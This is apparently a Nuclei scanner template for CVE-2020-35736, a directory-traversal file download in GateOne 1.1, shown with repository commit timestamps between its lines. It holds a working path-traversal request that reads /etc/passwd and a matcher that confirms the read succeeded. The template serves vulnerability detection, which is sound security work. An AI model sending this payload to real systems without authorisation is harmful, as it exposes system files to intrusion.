nuclei-templates/cves/2020/CVE-2020-35736.yaml

31 lines
836 B
YAML
Raw Normal View History

2021-05-27 12:56:22 +00:00
id: CVE-2020-35736
info:
2021-05-28 03:56:30 +00:00
name: GateOne Arbitrary File Download
2021-05-27 12:56:22 +00:00
author: pikpikcu
severity: high
2021-05-28 03:56:30 +00:00
description: GateOne 1.1 allows arbitrary file download without authentication via /downloads/.. directory traversal because os.path.join is misused.
reference:
2021-05-27 13:03:59 +00:00
- https://github.com/liftoff/GateOne/issues/747
2021-05-28 03:56:30 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-35736
tags: cve,cve2020,gateone,lfi
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2020-35736
cwe-id: CWE-22
2021-05-27 12:56:22 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd'
matchers-condition: and
matchers:
2021-05-27 15:02:32 +00:00
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2021-05-27 12:56:22 +00:00
- type: status
status:
2021-05-28 03:56:30 +00:00
- 200